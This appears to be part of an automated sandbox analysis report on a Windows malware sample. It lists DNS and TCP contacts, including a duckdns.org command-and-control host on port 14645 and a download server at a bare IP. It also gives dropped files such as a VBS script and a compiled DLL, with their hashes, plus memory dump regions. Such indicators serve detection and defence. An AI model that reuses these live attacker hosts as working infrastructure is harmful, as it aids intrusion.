| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 138.171.94.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 8.8.8.8:53 | 78.209.215.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | 36.228.227.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/2380-0-0x000000007139E000-0x000000007139F000-memory.dmp
memory/2380-1-0x0000000002730000-0x0000000002766000-memory.dmp
memory/2380-3-0x0000000005470000-0x0000000005A98000-memory.dmp
memory/2380-2-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-4-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-5-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/2380-7-0x00000000053B0000-0x0000000005416000-memory.dmp
memory/2380-6-0x0000000005240000-0x00000000052A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ult2edik.g24.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2380-17-0x0000000005AA0000-0x0000000005DF4000-memory.dmp
memory/2380-18-0x0000000006060000-0x000000000607E000-memory.dmp
memory/2380-19-0x00000000060E0000-0x000000000612C000-memory.dmp
memory/2788-29-0x0000000006B70000-0x0000000006BA2000-memory.dmp
memory/2788-30-0x000000006DC50000-0x000000006DC9C000-memory.dmp
memory/2788-40-0x0000000006BB0000-0x0000000006BCE000-memory.dmp
memory/2788-41-0x0000000006BE0000-0x0000000006C83000-memory.dmp
memory/2788-42-0x0000000007370000-0x00000000079EA000-memory.dmp
memory/2788-43-0x0000000006D30000-0x0000000006D4A000-memory.dmp
memory/2788-44-0x0000000006D90000-0x0000000006D9A000-memory.dmp
memory/2788-45-0x0000000006FC0000-0x0000000007056000-memory.dmp
memory/2788-46-0x0000000006F30000-0x0000000006F41000-memory.dmp
memory/2788-47-0x0000000006F60000-0x0000000006F6E000-memory.dmp
memory/2788-48-0x0000000006F70000-0x0000000006F84000-memory.dmp
memory/2788-49-0x0000000007080000-0x000000000709A000-memory.dmp
memory/2788-50-0x0000000006FB0000-0x0000000006FB8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.cmdline
| MD5 | b7e3156a3140f8647f63d191069fb96f |
| SHA1 | f672b6c3f2f0093e7cddb361b6798ef3c46f925d |
| SHA256 | c5946a3bf68566c83e41686e40eae3b5ec21141f9d3e49122d786cf5ceb8c652 |
| SHA512 | f3fdcb068e2ef554de73c211bb3ce27b8937bfe856f96bee3a1c22e66414945101953d5a1c7ef782bd0fcab328a81b716b149df12d79a3c654d8a22d6e6a697a |
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\2cdwynz5\CSCDA64DFACE0DA42CA848DA92076B13078.TMP
| MD5 | 5513a777acc16cc7e61d6626576dfad3 |
| SHA1 | e08b71fbf83acd787eaa5cc6240edcf04d205634 |
| SHA256 | 5d1ce286e0bb062bd644c1d3e858c1e79881910bf7bea56361af51e4a63ddd24 |
| SHA512 | 8a43b689658e809b6efd4f21210d6f1db3b5c2dd48ba0bbdf6f6b0966e297aadf47f993a7cdb5e897348ade1a5e2e8142842a9d01550927ca035ffc3d00ff5b3 |
C:\Users\Admin\AppData\Local\Temp\RES8973.tmp
| MD5 | a4072cfc69e8725ae3f90d7d5d843a3e |
| SHA1 | f4fe528fa2f09b8c312a89844807e2eabcf963a3 |
| SHA256 | 230cfc65eb13d72140be539e0938beca2c4d9e84e313cca7172d11917506b298 |
| SHA512 | ec47becc0ce9e9380d82aafcc9b83b0fa30d7c5556a967678eb4f05f167c79a855ae23234dc4dad5b9997bb763eb08fe014d476d656c6e7d62ae33f5daf9bd40 |
C:\Users\Admin\AppData\Local\Temp\2cdwynz5\2cdwynz5.dll
| MD5 | 0415564716cc54a5359eef0f7f716726 |
| SHA1 | 3bc2653d3f220e634e7fd94ec1a4c745944a6c61 |
| SHA256 | df4ec5135cab9aa5d142f5ae6eb698a5b4dbf4aabfa024cb9d26c459cf7bb573 |
| SHA512 | abc7187d41e765f6777c80e291e9714d5b0134599c2b36935f8e7243ea7a4e278a03f1f24127648df308fd7e69f4acec615725aa808123e71367eb035ee5ad14 |
memory/2380-65-0x0000000006600000-0x0000000006608000-memory.dmp
memory/2380-71-0x000000007139E000-0x000000007139F000-memory.dmp
memory/2380-72-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/2380-73-0x0000000007410000-0x0000000007432000-memory.dmp
memory/2380-74-0x00000000082C0000-0x0000000008864000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 43a2b4a4d85d6bcac9370ac8c43e349e |
| SHA1 | 20dc96aeea54bc80dbf14aa14dc7438a541552a4 |
| SHA256 | 8d997bb66acd09e65f0aa0f85c22e6e662103598b93a25d52b4a1ca041ca3b4d |
| SHA512 | 0e78e95e673d60bd4da138b00f7f56113c61c6e7d73c85781992d465500dd3fc2e7d6473cea1d6ceaa0cde1a0549a613fb65de51aaa7e6a63c7b93f4a02726c0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWErshell.ExE.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/2380-81-0x0000000071390000-0x0000000071B40000-memory.dmp
memory/4704-91-0x0000000005F50000-0x00000000062A4000-memory.dmp
memory/2540-102-0x00000000076C0000-0x0000000007818000-memory.dmp
memory/2540-103-0x0000000007820000-0x00000000078BC000-memory.dmp
memory/1220-104-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-105-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-106-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cfb1d207bb042df913f8b1f4782619b6 |
| SHA1 | 4cef72d8531b3bdfa17fd9b1c4a561f4b0e564d4 |
| SHA256 | f7b4f9ea6407759cef2410343e5717ce240ce1a68fa3695b5a37a3cc365a2c6c |
| SHA512 | 70884297b6a83459b6c9d643138d79157bbcb8d021d346f3c8dde8104abea0c71e9390c14d0d22055425fe13750b243b86a37059829db90fc772d029554a5464 |
memory/1220-110-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-112-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-111-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-113-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-114-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-116-0x0000000000400000-0x000000000047F000-memory.dmp
memory/2356-117-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2988-118-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2988-122-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2988-121-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3128-126-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3128-128-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3128-127-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2356-120-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2356-119-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nkoydxwzt
| MD5 | 7aca43b2800ceb18b3ed2326532545de |
| SHA1 | d4cf207ef85bd749d59c1cb27a09c167ee21523a |
| SHA256 | 3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480 |
| SHA512 | 0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f |
memory/1220-131-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-134-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-135-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1220-136-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-138-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-137-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-140-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-139-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-141-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-142-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-144-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1220-143-0x0000000000400000-0x000000000047F000-memory.dmp